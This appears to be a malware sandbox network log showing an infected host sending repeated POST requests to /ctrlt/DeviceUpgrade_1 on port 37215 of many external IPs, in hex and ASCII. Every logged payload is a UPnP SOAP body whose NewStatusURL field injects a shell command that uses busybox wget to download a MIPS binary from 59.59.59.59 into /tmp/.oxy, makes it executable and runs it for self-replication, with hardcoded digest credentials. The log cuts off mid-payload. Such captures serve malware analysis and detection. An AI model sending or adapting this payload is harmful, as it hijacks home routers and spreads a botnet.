                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          779192.168.2.1545360157.238.176.10237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669325113 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          780192.168.2.153739241.36.22.16737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669390917 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          781192.168.2.1541928177.133.157.22337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669431925 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          782192.168.2.153401241.48.230.237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669447899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          783192.168.2.1555220197.126.55.22437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669486046 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          784192.168.2.1541804197.209.135.5637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669570923 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          785192.168.2.155547841.7.77.19637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669595003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          786192.168.2.1548706197.159.31.14537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669747114 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          787192.168.2.1541208157.95.83.24937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669760942 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          788192.168.2.1560548157.40.26.2837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:53.669785976 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 